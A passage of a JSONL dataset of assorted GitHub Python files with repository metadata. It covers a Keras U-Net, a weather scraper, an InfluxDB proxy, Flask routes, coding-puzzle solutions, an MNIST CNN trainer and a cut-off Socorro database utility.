axis=3)\r\n up8 = merge([UpSampling2D(size=(2, 2))(conv7), conv2], mode='concat', concat_axis=1)\r\n conv8 = Conv2D(32, (3, 3), activation='relu', padding='same')(up8)\r\n conv8 = Conv2D(32, (3, 3), activation='relu', padding='same')(conv8)\r\n \r\n #up9 = concatenate([UpSampling2D(size=(2, 2))(conv8), conv1], axis=3)\r\n up9 = merge([UpSampling2D(size=(2, 2))(conv8), conv1], mode='concat', concat_axis=1)\r\n \r\n conv9 = Conv2D(16, (3, 3), activation='relu', padding='same')(up9)\r\n conv9 = Conv2D(16, (3, 3), activation='relu', padding='same')(conv9)\r\n\r\n conv10 = Conv2D(1, (1, 1), activation='sigmoid')(conv9)\r\n\r\n self.net = Model(inputs=[inputs], outputs=[conv10])\r\n \r\n \r\n \r\n self.net.compile(loss=dice_coef_loss,optimizer=Adam(lr=1e-5),metrics=[dice_coef])\r\n \r\n def learn(self,data,epoch=1):\r\n self.net.fit(data[0], data[1],batch_size=2, nb_epoch=epoch, verbose=1)\r\n \r\n\r\n def load(self,size,file):\r\n \r\n if os.path.isfile(file):\r\n \r\n #self.net=load_model(file)\r\n self.create(size)\r\n self.net.load_weights(file)\r\n \r\n print(\"File loaded...\")\r\n else:\r\n print(\"File do not exist...\")\r\n \r\n def evaluate(self,data):\r\n return self.net.evaluate(data[0], data[1], verbose=1)\r\n \r\n def predict(self,inputData,outputShape):\r\n return np.reshape(self.net.predict(inputData,batch_size=1,verbose=0),outputShape)\r\n \r\n def predictSet(self,data,shape,frame):\r\n \r\n result = np.zeros((frame[0]*shape[0],frame[1]*shape[1]))\r\n \r\n for i in range(shape[0]):\r\n \r\n for j in range(shape[1]):\r\n \r\n arr=data[0][i*shape[1]+j][0]\r\n \r\n arr2=np.resize(arr,(1,1,frame[0],frame[1]))\r\n im=np.reshape(self.predict(arr2,frame),(frame[0],frame[1]))\r\n \r\n result[i*frame[0]:(i+1)*frame[0],j*frame[1]:(j+1)*frame[1]]=im\r\n os.system('cls')\r\n print(str(i*shape[1]+j+1)+\"/\"+str(shape[0]*shape[1]))\r\n \r\n return result\r\n \r\n \r\n ","repo_name":"wosiu2/VesslesIM","sub_path":"network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":6503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"28079906318","text":"# Program to add two numbers in Python\r\n#by using input from the user\r\n\r\nfrom tkinter import Y\r\n\r\n\r\nx = input(\"Enter the value of x:\")\r\ny = input(\"Enter the value of y:\")\r\n\r\nsum = int(x) + int(y)\r\nsub = int(x) - int(y)\r\nmul = int(x) * int(y)\r\nmod = int(x) % int(y)\r\ndiv = int(x) / int(y)\r\n\r\n\r\nprint(\"The addition of two numbers is:\",sum)\r\nprint(\"The subtraction of x and y is:\", sub)\r\nprint(\"The multiply value of x and y is:\", mul)\r\nprint(\"THe division of x an dy is:\", mod)\r\nprint(\"The division of x and y is:\", div)","repo_name":"Jaskirat1/Python_practise","sub_path":"Add_two_numbers.py","file_name":"Add_two_numbers.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"92"} +{"seq_id":"74321071980","text":"#!/usr/bin/python3\n# -*- coding:utf-8 -*-\n\nimport requests\nfrom bs4 import BeautifulSoup\nfrom pyecharts.charts import Bar\nfrom pyecharts import options as opts\n\nheaders = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36'\n}\nALL_DATA = []\n\n\ndef parse_page(url):\n resp = requests.get(url, headers=headers)\n text = resp.content.decode('utf-8')\n soup = BeautifulSoup(text, 'html5lib')\n conMidtab = soup.find('div', class_='conMidtab')\n tables = conMidtab.find_all('table')\n for tab in tables:\n trs = tab.find_all('tr')[2:]\n for index, tr in enumerate(trs):\n tds = tr.find_all('td')\n city_td = tds[0]\n if index == 0:\n city_td = tds[1]\n city = list(city_td.stripped_strings)[0]\n temp_td = tds[-2]\n min_temp = list(temp_td.stripped_strings)[0]\n ALL_DATA.append({'city': city, 'min_temp': int(min_temp)})\n # print(city, min_temp)\n\n\ndef main():\n base_url = 'http://www.weather.com.cn/textFC/{}.shtml'\n area = ['hb', 'db', 'hd', 'hz', 'hn', 'xb', 'xn', 'gat']\n for x in area:\n url = base_url.format(x)\n parse_page(url)\n\n # 分析数据\n # 根据最低气温排序\n ALL_DATA.sort(key=lambda data: data['min_temp'])\n print(ALL_DATA)\n\n # 可视化\n data = ALL_DATA[0:10]\n cities = list(map(lambda x: x['city'], data))\n temps = list(map(lambda x: x['min_temp'], data))\n # chart = Bar('中国天气最低气温排行榜')\n # chart.add('', cities, temps)\n bar = (\n Bar()\n .add_xaxis(cities)\n .add_yaxis('城市',temps,category_gap=\"80%\")\n .set_global_opts(title_opts=opts.TitleOpts(title=\"中国天气最低气温排行榜\"))\n )\n bar.render('temperature.html')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"xuyanbo03/python-demo","sub_path":"2.基础爬虫/bs_weather.py","file_name":"bs_weather.py","file_ext":"py","file_size_in_byte":1909,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"70008398700","text":"from influxdb import InfluxDBClient\nimport requests\nimport time\nimport threading\nimport logging\nfrom queue import Queue\n\n\nclass InfluxDBproxy:\n def __init__(self, dbhost: str, dbname: str, measurement_prefix: str):\n self.database = InfluxDBClient(dbhost, timeout=1, retries=1)\n self.dbname = dbname\n self.prefix = measurement_prefix\n self.isConnected = False\n self.isChecked = False\n self._stop = False\n\n self._data_queue = Queue()\n self._run_consumer = False\n self._consumer_thread = None\n\n self.logger = logging.getLogger('RKID.DBproxy')\n self.logger.setLevel(logging.DEBUG)\n\n self.check_connection()\n if not self.isConnected:\n self.logger.warning(f'Could not connect to database at {dbhost}')\n\n self.checkThread = threading.Thread(target=self.check_loop)\n self.checkThread.start()\n\n def stop_checking(self):\n self.logger.info(\"Stopping database proxy\")\n self._stop = True\n if self.checkThread is not None:\n self.checkThread.join()\n self.checkThread = None\n self.logger.info(\"Database proxy stopped\")\n\n def check_connection(self):\n self._perform_on_db(self.database.ping)\n return self.isConnected\n\n def _set_connected(self):\n if not self.isConnected:\n self.logger.warning('Connected to database')\n self.isConnected = True\n\n def _set_disconnected(self):\n if self.isConnected:\n self.logger.warning('Disconnected from database')\n self.isConnected = False\n\n def check_loop(self):\n while not self._stop:\n prev_status = self.isChecked\n new_status = self.check_connection()\n\n if not prev_status and new_status:\n self.prepare_db()\n\n time.sleep(3)\n\n def prepare_db(self):\n dbs = self.database.get_list_database()\n # create database if not exists\n if not {'name': self.dbname} in dbs:\n self.database.create_database(self.dbname)\n\n # switch to database\n self.database.switch_database(self.dbname)\n self.isChecked = True\n\n def save_data(self, data: dict):\n name = data.pop('name')\n db_json = [{\n \"measurement\": self.prefix + '_' + name,\n \"fields\": data,\n \"tags\": {}\n }]\n\n if self.isConnected:\n try:\n self.database.write_points(db_json)\n return True\n except requests.exceptions.ConnectTimeout:\n self.isChecked = False\n self.logger.warning('Connection lost to DB')\n return False\n else:\n return False\n\n def get_list_measurements(self):\n if self.isConnected:\n measurements = self._perform_on_db(self.database.get_list_measurements)\n\n names = []\n for measurement in measurements:\n names.append(measurement['name'])\n\n return names\n\n raise ConnectionError(\"Isn't connected to database!\")\n\n def get_measurement(self, measurement_name: str):\n # influxdb only supports bind params in WHERE clause\n # https://docs.influxdata.com/influxdb/v1.7/tools/api/#bind-parameters\n return self._perform_on_db(self.database.query,\n query=f'SELECT * FROM \"{measurement_name}\"')\n\n def delete_measurement(self, measurement_name: str):\n self._perform_on_db(self.database.drop_measurement, measurement_name)\n\n def _perform_on_db(self, function, *args, **kwargs):\n try:\n ret = function(*args, **kwargs)\n self._set_connected()\n return ret\n except requests.exceptions.ConnectTimeout:\n self._set_disconnected()\n\n def push_data(self, data):\n self._data_queue.put(data)\n\n def _consumer_function(self):\n while self._run_consumer:\n msg_num = 0\n line_protocol_data = []\n while not self._data_queue.empty():\n while msg_num < 5000 and not self._data_queue.empty():\n data = self._data_queue.get()\n line_protocol_data.append(self.data2lineprotocol(data))\n try:\n self.database.write_points(line_protocol_data, protocol='line')\n except requests.exceptions.ConnectTimeout:\n self.logger.warning('Connection lost to DB')\n\n time.sleep(0.010)\n\n def data2lineprotocol(self, data: dict):\n name = data.pop('name')\n measurement = self.prefix + '_' + name\n measurement = measurement.replace(' ', '_')\n\n fields = [f'{str(key)}={str(data[key])}'.replace(' ','_') for key in data.keys()]\n line = f'{measurement} {\",\".join(fields)}'\n return line\n\n def start_consumer(self):\n self._consumer_thread = threading.Thread(target=self._consumer_function)\n self._run_consumer = True\n self._consumer_thread.start()\n\n def stop_consumer(self):\n self._run_consumer = False\n if self._consumer_thread is not None:\n self._consumer_thread.join()\n\n self._consumer_thread = None\n","repo_name":"izsoandras/robonaut_rekeszkutato_gui","sub_path":"utils/InfluxDBproxy.py","file_name":"InfluxDBproxy.py","file_ext":"py","file_size_in_byte":5254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"7871910879","text":"from flask import render_template, flash, redirect,request\nfrom . import products\nfrom werkzeug.utils import secure_filename\nfrom .forms import NewProductForm, EditProductForm\nimport app\nimport os\n\n@products.route('/')\ndef index():\n p = app.models.Producto.query.all()\n return render_template('list.html', productos = p)\n\n@products.route('/create', methods =[ 'GET' , 'POST'])\ndef create():\n p = app.models.Producto()\n form_registro = NewProductForm()\n if form_registro.validate_on_submit():\n form_registro.populate_obj(p)\n p.imagen = form_registro.imagen.data.filename\n app.db.session.add(p)\n app.db.session.commit()\n\n ##return os.getcwd()\n file = form_registro.imagen.data\n filename = secure_filename(file.filename)\n file.save(os.path.abspath(os.getcwd() + '/app/products/images/' + filename))\n\n flash(\"registro exitoso\")\n return redirect('/products')\n return render_template('new.html', form=form_registro)\n\n@products.route('/edit/<product_id>' , methods =[ 'GET' , 'POST'])\ndef edit(product_id):\n p = app.models.Producto.query.get(product_id)\n form_edit = EditProductForm(obj = p)\n if form_edit.validate_on_submit():\n form_edit.populate_obj(p)\n app.db.session.commit()\n return \"actualizacion exitosa\"\n return render_template(\"new.html\" , form = form_edit)\n\n@products.route('/holitas')\ndef holitas():\n return render_template(\"new.html\")\n\n\n","repo_name":"Elshaman/xpo2","sub_path":"app/products/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"12495509683","text":"def leiaint(msg):\n while True:\n try:\n n = int(input(msg))\n except (TypeError, ValueError):\n print('\\033[0;31mERRO! Por favor digite um número inteiro VALIDO!\\033[m')\n continue\n else:\n return n\n\n\ndef leiafloat(msg):\n while True:\n try:\n n = float(input(msg))\n except (TypeError, ValueError):\n print('\\033[0;31mERRO! Por favor digite um número real VALIDO!\\033[m')\n continue\n else:\n return n\n\n\nNUM_INT = leiaint('Digite um número inteiro: ')\nNUM_REAL = leiafloat('Digite um número real: ')\nprint(f'O número inteiro foi {NUM_INT} e o número real foi {NUM_REAL}.')","repo_name":"Matheus-Barbiot/Exercicios_Python_CEV","sub_path":"Exercícios_CEV/Desafio_113.py","file_name":"Desafio_113.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"12730406030","text":"def longest_common_substr(str1, str2):\r\n if not str1 or not str2:\r\n return 0\r\n if len(str1) <= 0 or len(str2) <= 0:\r\n return 0\r\n '''\r\n str1 = 'app'\r\n str2 = 'ppt'\r\n \r\n table[i][j] 记录 str1[0, i-1] (前 i 个) 和 str2[0, j-1] (前 j 个)的最长公共子串\r\n \r\n table[i][j] = table[i-1][j-1] + 1 if str1[i-1] == str2[j-1]\r\n 0 otherwise\r\n ~ a p p\r\n ~ 0 0 0 0\r\n p 0 0 1 1\r\n p 0 0 1 2\r\n t 0 1 1 0\r\n '''\r\n m = len(str1)\r\n n = len(str2)\r\n table = [[0 for j in range(n + 1)] for i in range(m + 1)]\r\n lcs = 0\r\n for i in range(1, m + 1):\r\n for j in range(1, n + 1):\r\n table[i][j] = table[i - 1][j - 1] + 1 if str1[i - 1] == str2[j - 1] else 0\r\n lcs = max(lcs, table[i][j])\r\n return lcs\r\n\r\n\r\nif __name__ == '__main__':\r\n str1 = 'app'\r\n str2 = 'ppt'\r\n res = longest_common_substr(str1, str2)\r\n print(res)","repo_name":"hu-guanwei/coding","sub_path":"lcs_i.py","file_name":"lcs_i.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"92"} +{"seq_id":"24098539546","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Feb 24 22:24:17 2020\r\n\r\n@author: liuga\r\n\"\"\"\r\nimport random\r\n\r\nclass Solution(object):\r\n def randomIndex(self, nums, k):\r\n \r\n e = nums.count(k)\r\n i = random.randint(1, e)\r\n for j in range(len(nums)):\r\n if nums[j] == k:\r\n i = i-1\r\n if i == 0:\r\n return j\r\n\r\n\r\ndef __init__(self, nums):\r\n self.nums = nums\r\n \r\ndef pick(self, target):\r\n res = None\r\n count = 0\r\n for i, x in enumerate(self.nums):\r\n if x == target:\r\n count += 1\r\n chance = random.randint(1, count)\r\n if chance == count:\r\n res = i\r\n return res\r\n","repo_name":"Misskesite/Leetcode","sub_path":"398randomIndex.py","file_name":"398randomIndex.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"25970228185","text":"# Author: btjanaka (Bryon Tjanaka)\n# Problem: (LeetCode) 149\n# Title: Max Points on a Line\n# Link: https://leetcode.com/problems/max-points-on-a-line\n# Idea: This solution looks at every point and checks how many other points\n# align with it along a given line.\n# Difficulty: hard\n# Tags: geometry\nfrom math import gcd\nfrom fractions import Fraction\nfrom collections import defaultdict\n\n\nclass Solution:\n\n def maxPoints(self, points: List[List[int]]) -> int:\n if len(points) == 1: return 1\n mx = 0\n for x1, y1 in points:\n line_counts = defaultdict(int)\n for x2, y2 in points:\n if x1 == x2 and y1 == y2: continue\n if x1 == x2:\n line_counts[1, 0, 0, 0] += 1\n continue # vertical line\n m = Fraction(y2 - y1, x2 - x1)\n m /= gcd(m.numerator, m.denominator)\n b = y2 - m * x2\n line_counts[(m.numerator, m.denominator, b.numerator,\n b.denominator)] += 1\n count = 0 if len(line_counts) == 0 else max(line_counts.values())\n mx = max(count + points.count([x1, y1]), mx)\n return mx\n","repo_name":"btjanaka/algorithm-problems","sub_path":"leetcode/149.py","file_name":"149.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"92"} +{"seq_id":"18002687674","text":"import simplejson\nimport os\nimport logging\nfrom sortedcontainers import sorteddict\nimport datetime\n\nconfig_path = './config/'\nconfig_file_name = 'config.json'\naddons_file_name = 'addons.json'\n\n\nclass Settings(object):\n\n def __init__(self):\n self.config = sorteddict.SortedDict()\n self.addons = sorteddict.SortedDict()\n self.initialize_data()\n self.files_to_update = []\n self.load_config()\n self.load_addons()\n self.check_retro()\n\n def initialize_data(self):\n if not os.path.isdir('./config'):\n os.mkdir('./config')\n logging.critical(\"Creating config directory.\")\n else:\n logging.info(\"Config directory exists.\")\n\n if not os.path.exists(config_path + config_file_name):\n self.config['settings'] = {'wow_dir': '', 'prompt_to_close': True, \"remove_old_archive\": True}\n\n logging.info(\"Creating config.json file.\")\n self.save_config()\n\n if not os.path.exists(config_path + addons_file_name):\n self.addons['addons'] = {}\n logging.info(\"Creating addons.json file.\")\n\n self.save_addons()\n\n def check_for_wow_directory(self, parent):\n\n if self.config['settings']['wow_dir'] == '':\n parent.MessageBox.emit(\"Addons directory not found.\",\n \"Please specify the directory where you want the addons to be downloaded to in \"\n \"the Settings window.\" \n \"\\n\\nThis is usually: 'World of Warcraft/Interface/AddOns'\\n\", 'inform')\n\n return False\n\n return True\n\n def check_retro(self):\n if 'settings' not in self.config:\n self.config['settings'] = {}\n\n if 'wow_dir' not in self.config['settings']:\n self.config['settings']['wow_dir'] = \"\"\n self.save_config()\n\n if 'prompt_to_close' not in self.config['settings']:\n self.config['settings']['prompt_to_close'] = True\n self.save_config()\n\n if 'remove_old_archive' not in self.config['settings']:\n self.config['settings']['remove_old_archive'] = True\n self.save_config()\n\n if 'addons' not in self.addons:\n self.addons['addons'] = \"\"\n self.save_addons()\n\n # Check if addon information is in the config.json file.\n if 'addons' in self.config:\n print(\"Addons in config.\")\n\n self.addons['addons'] = self.config['addons']\n self.config.pop('addons', None)\n self.save_config()\n self.save_addons()\n\n now = datetime.datetime.now()\n for addon in self.addons['addons']:\n if 'last_update_date' not in self.addons['addons'][addon]:\n self.addons['addons'][addon]['last_update_date'] = \"{0}/{1}/{2}\".format(now.month, now.day, now.year)\n self.save_addons()\n\n if 'last_update_data' in self.addons['addons'][addon]:\n self.addons['addons'][addon]['last_update_date'] = self.addons['addons'][addon]['last_update_data']\n del self.addons['addons'][addon]['last_update_data']\n\n def write_addon_info(self, key, info):\n self.addons['addons'][key] = info\n\n def load_config(self):\n with open(config_path + config_file_name, 'r') as f:\n self.config = simplejson.loads(f.read())\n\n def load_addons(self):\n with open(config_path + addons_file_name, 'r') as f:\n self.addons = simplejson.loads(f.read())\n\n def save_config(self):\n with open(config_path + config_file_name, 'w') as f:\n f.write(simplejson.dumps(self.config, indent=4, ensure_ascii=True))\n\n def save_addons(self):\n self.addons['addons'] = {k: self.addons['addons'][k] for k in sorted(self.addons['addons'])}\n\n with open(config_path + addons_file_name, 'w') as f:\n f.write(simplejson.dumps(self.addons, indent=4, ensure_ascii=True))\n\n def get_settings_keys(self):\n for key in self.addons['addons']:\n print(key)\n\n\nif __name__ == '__main__':\n s = Settings()\n # s.get_settings_keys()\n # s.write_addon_info('test', {'url': 'd', 'ver': '4'})\n # s.write_addon_info('test1', {'url': 'd', 'ver': '4'})\n # s.save_config()\n s.load_config()\n\n s.get_settings_keys()\n","repo_name":"PaulCanada/wow-addon-updater","sub_path":"src/dev/classes/application/Settings.py","file_name":"Settings.py","file_ext":"py","file_size_in_byte":4370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"676881799","text":"from utils import *\nfrom skimg_local import rgb2hsv, hsv2rgb\n\n\ndef select_channels(img_RGB):\n \"\"\"\n Returns the R' and V* channels for a skin lesion image.\n\n Args:\n img_RGB (np.array): The RGB image of the skin lesion\n \"\"\"\n img_RGB_norm = img_RGB / 255.0\n img_r_norm = img_RGB_norm[..., 0] / (\n img_RGB_norm[..., 0] + img_RGB_norm[..., 1] + img_RGB_norm[..., 2]\n )\n img_v = np.max(img_RGB, axis=2)\n\n return (img_r_norm, img_v)\n\n\ndef calculate_GRAY(img_RGB):\n \"\"\"\n Returns the single channel grayscale representation of\n the skin lesion.\n\n Args:\n img_RGB (np.array): The RGB image of the skin lesion\n \"\"\"\n img_torch = torch.from_numpy(img_RGB) + eps\n\n X = torch.log(torch.reshape(img_torch, (-1, 3)))\n X_mean = torch.mean(X, 0)\n X -= X_mean.expand_as(X)\n\n U, S, V = torch.svd(torch.t(X))\n C = torch.mm(X, U[..., :1])\n C_reshaped = torch.reshape(C, (128, 128, -1))[..., 0]\n\n C_reshaped_np = C_reshaped.cpu().detach().numpy()\n\n return C_reshaped_np\n\n\ndef calculate_Intrinsic_SA(img_RGB):\n \"\"\"\n Returns the illumination invariant 'intrinsic' image and \n the shading attentuated representation for the skin lesion.\n\n Args:\n img_RGB (np.array): The RGB image of the skin lesion\n \"\"\"\n img_torch = torch.from_numpy(img_RGB) + eps\n angle, projected = entropy_intrinsic(img_torch, calculate_intrinsic_img=True)\n projected_np = projected.cpu().detach().numpy()\n\n img_RGB_norm = img_RGB / 255.0\n projected_norm = projected_np / 255.0\n img_HSV = rgb2hsv(img_RGB)\n matched = hist_match(img_HSV[..., 2], projected_norm)\n img_HSV[..., 2] = matched\n img_RGB_SA_norm = hsv2rgb(img_HSV)\n img_RGB_SA = img_RGB_SA_norm * 255\n\n return (projected_np, img_RGB_SA)\n","repo_name":"kakumarabhishek/Illumination-based-Transformations-Skin-Lesion-Segmentation","sub_path":"transformations.py","file_name":"transformations.py","file_ext":"py","file_size_in_byte":1784,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"92"} +{"seq_id":"74947194540","text":"from itertools import repeat\nimport pandas\n\ndf = pandas.read_csv('appcategory_associations.csv')\n\nprint('\\nPreview:')\nprint(df)\n\nprint('\\nNumber of rows: ' + str(df.shape[0]))\n\nweights = []\n\ncount = 0\nactualID = df['appid'][0]\n\n\nfor i in range(df.shape[0]):\n\n if df['appid'][i] == actualID:\n count += 1\n\n else:\n weights.extend((1/count) for i in range(count))\n\n count = 1\n actualID = df['appid'][i]\n\n\n # To not skip the last weight addition of the last game. \n if i == df.shape[0] - 1: \n weights.extend((1/count) for i in range(count))\n\n\ndfWithWeights = df.assign(weights=weights)\n\nprint('\\Dataframe preview with weights:')\nprint(dfWithWeights)\n\ndfWithWeights.to_csv('appcategory_associations_with_weights.csv', index=False)\n\n# Uncomment to save the new dataframes on a csv files.\n","repo_name":"DavidG33k/SteamDataWarehouse","sub_path":"DataSet Steam/scripts/MultipleArcsWeightGenerator.py","file_name":"MultipleArcsWeightGenerator.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"36192397732","text":"import tensorflow as tf\r\nimport numpy as np\r\nimport math\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.image as mpimg\r\n\r\nfrom tensorflow.examples.tutorials.mnist import input_data\r\nmnist = input_data.read_data_sets('data/MNIST/', one_hot=True)\r\n\r\n\r\n#input_data\r\nimg_size = 28\r\nn_classes = 10\r\nbatch_size = 100\r\nn_epochs = 3\r\n\r\n#conv_1\r\nfilter_size_1 = 5\r\nnum_filter_1 = 16\r\n\r\n#max_pool_1\r\nfilter_size_m1 = 2\r\n\r\n#conv_2\r\nfilter_size_2 = 5\r\nnum_filter_2 = 36\r\n\r\n#max_pool_2\r\nfilter_size_m2 = 2\r\n\r\n#full_conn\r\nfc_num_features = 128\r\nn_feature = 7*7*36\r\n\r\n#Weights and Biases\r\nweights={'weight_conv1':tf.Variable(tf.random_normal([filter_size_1,filter_size_1,1,num_filter_1])),\r\n 'weight_conv2':tf.Variable(tf.random_normal([filter_size_2,filter_size_2,num_filter_1,num_filter_2])),\r\n 'weight_fully_conn1':tf.Variable(tf.random_normal([n_feature, fc_num_features])),\r\n 'weight_fully_conn2':tf.Variable(tf.random_normal([fc_num_features, n_classes]))\r\n }\r\n\r\nbiases={'biases_conv1':tf.Variable(tf.constant(0.05, shape=[num_filter_1])),\r\n 'biases_conv2':tf.Variable(tf.constant(0.05, shape=[num_filter_2])),\r\n 'biases_fully_conn1':tf.Variable(tf.constant(0.05, shape=[fc_num_features])),\r\n 'biases_fully_conn2':tf.Variable(tf.constant(0.05, shape=[n_classes]))\r\n }\r\n \r\nx = tf.placeholder(tf.float32, shape=[None, img_size*img_size], name = 'x')\r\n\r\ny = tf.placeholder(tf.float32, shape=[None, n_classes], name = 'y')\r\n\r\nsaver = tf.train.Saver()\r\n\r\n#Layers of the neural network\r\ndef conv_layer(image, weights, biases):\r\n return tf.nn.conv2d(input=image,\r\n filter=weights,\r\n strides=[1,1,1,1],\r\n padding='SAME')+biases\r\ndef max_pool(image):\r\n return tf.nn.max_pool(value=image,\r\n ksize=[1,2,2,1],\r\n strides=[1,2,2,1],\r\n padding='SAME')\r\ndef relu(image):\r\n return tf.nn.relu(image)\r\ndef fully_connected_layer(image, weights, biases):\r\n return tf.matmul(image,weights)+biases\r\n\r\n#neural_network_model\r\ndef neural_nework_model(x, testing):\r\n\r\n x = tf.reshape(x, [-1, img_size, img_size, 1])\r\n conv1 = conv_layer(x, weights['weight_conv1'], biases['biases_conv1'])\r\n max1 = max_pool(conv1)\r\n relu1 = relu(max1)\r\n conv2 = conv_layer(relu1, weights['weight_conv2'], biases['biases_conv2'])\r\n max2 = max_pool(conv2)\r\n relu2 = relu(max2)\r\n\r\n #reshape for the fully connected layer\r\n fc = tf.reshape(relu2, [-1, n_feature])\r\n \r\n fcl = fully_connected_layer(fc, weights['weight_fully_conn1'], biases['biases_fully_conn1'])\r\n relu3 = relu(fcl)\r\n fcl2 = fully_connected_layer(relu3, weights['weight_fully_conn2'], biases['biases_fully_conn2']) \r\n\r\n output = tf.nn.softmax(fcl2)\r\n if testing:\r\n return tf.argmax(output, dimension=1)\r\n\r\n return output\r\n\r\ndef train_neural_network(x, y):\r\n\r\n model = neural_nework_model(x, False)\r\n\r\n cross_entropy = tf.nn.softmax_cross_entropy_with_logits(logits = model,\r\n labels = y)\r\n\r\n cost = tf.reduce_mean(cross_entropy)\r\n\r\n optimizer = tf.train.AdamOptimizer(learning_rate=1e-4).minimize(cost)\r\n\r\n prediction = tf.equal(tf.argmax(model, 1), tf.argmax(y, 1))\r\n\r\n accuracy = tf.reduce_mean(tf.cast(prediction, tf.float32))\r\n \r\n with tf.Session() as ses:\r\n ses.run(tf.initialize_all_variables())\r\n #print('old weights: ',ses.run(weights['weight_conv1']))\r\n\r\n for epoch in range(n_epochs):\r\n epoch_loss = 0\r\n for i in range(int(mnist.train.num_examples/batch_size)):\r\n\r\n x_set, y_set = mnist.train.next_batch(batch_size)\r\n _, c = ses.run([optimizer, cost], feed_dict={x: x_set,\r\n y: y_set})\r\n\r\n epoch_loss += c\r\n print('Epoch: ', epoch, ' Loss: ', epoch_loss)\r\n print(ses.run(weights['weight_conv1']))\r\n save_path = saver.save(ses, 'F:/python/trained_data/mnist_data/data.ckpt')\r\n #For testing the changes\r\n acc = accuracy.eval({x:mnist.test.images,\r\n y:mnist.test.labels})\r\n #print('new weights: ',ses.run(weights['weight_conv1']))\r\n\r\n print('Accuracy: ', acc)\r\n \r\ntrain_neural_network(x, y)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"SangameshMOtageri/Number_recognition_interface","sub_path":"model_used_to_train_ocr1.py","file_name":"model_used_to_train_ocr1.py","file_ext":"py","file_size_in_byte":4470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"22518864034","text":"# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this\n# file, You can obtain one at http://mozilla.org/MPL/2.0/.\n\nimport logging\n\nfrom socorro.external.postgresql.base import PostgreSQLBase\n\nimport socorro.lib.external_common as external_common\n\nlogger = logging.getLogger(\"webapi\")\n\n\nclass Util(PostgreSQLBase):\n\n \"\"\"\n Implement /util services with PostgreSQL.\n \"\"\"\n\n def versions_info(self, **kwargs):\n \"\"\"\n Return information about versions of a product.\n\n See https://socorro.readthedocs.io/en/latest/middleware.html\n\n Keyword arguments:\n versions - List of products and versions.\n\n Return:\n None if versions is null or empty ;\n Otherwise a dictionary of data about a version, i.e.:\n {\n \"product_name:version_string\": {\n \"product_version_id\": integer,\n \"version_string\": \"string\",\n \"product_name\": \"string\",\n \"major_version\": \"string\" or None,\n \"release_channel\": \"string\" or None,\n \"build_id\": [list, of, decimals] or None\n }\n }\n\n \"\"\"\n # Parse arguments\n filters = [\n (\"versions\", None, [\"list\", \"str\"])\n ]\n params = external_common.parse_arguments(filters, kwargs)\n\n if \"versions\" not in params or not params[\"versions\"]:\n return None\n\n products_list = []\n (versions_list, products_list) = self.parse_versions(\n params[\"versions\"],\n products_list\n )\n\n if not versions_list:\n return None\n\n versions = []\n products = []\n for x in xrange(0, len(versions_list), 2):\n products.append(versions_list[x])\n versions.append(versions_list[x + 1])\n\n params = {}\n params = self.dispatch_params(params, \"product\", products)\n params = self.dispatch_params(params, \"version\", versions)\n prefixed_versions = [\"^%s\" % x for x in versions]\n params = self.dispatch_params(\n params,\n \"start_with_version\",\n prefixed_versions\n )\n\n where_product = []\n where_rapid_beta = []\n for i in range(len(products)):\n where_product.append(\"\"\"\n (pv.product_name = %%(product%(i)s)s\n AND pv.version_string ~ %%(start_with_version%(i)s)s)\n \"\"\" % {'i': i})\n where_rapid_beta.append(\"\"\"\n (\n i1.version_string = %%(version%(i)s)s\n AND i1.version_string = i2.version_string\n ) OR (\n i1.rapid_beta_id = i2.product_version_id\n AND i2.version_string = %%(version%(i)s)s\n AND i2.is_rapid_beta IS TRUE\n )\n \"\"\" % {'i': i})\n\n sql = \"\"\"\n /* socorro.external.postgresql.util.Util.versions_info */\n WITH infos AS (\n SELECT\n pv.product_version_id,\n pv.version_string,\n pv.product_name,\n pv.release_version,\n pv.build_type,\n pvb.build_id,\n pv.is_rapid_beta,\n pv.rapid_beta_id,\n pv.version_sort\n FROM product_versions pv\n LEFT JOIN product_version_builds pvb ON\n (pv.product_version_id = pvb.product_version_id)\n WHERE %(product_filters)s\n )\n SELECT DISTINCT\n i1.product_version_id,\n i1.product_name,\n i1.version_string,\n i1.release_version,\n i1.build_type,\n i1.build_id,\n i1.is_rapid_beta,\n i2.is_rapid_beta AS is_from_rapid_beta,\n (i2.product_name || ':' || i2.version_string)\n AS from_beta_version,\n i1.version_sort\n FROM infos i1\n LEFT JOIN infos i2 ON (\n i1.product_name = i2.product_name\n AND 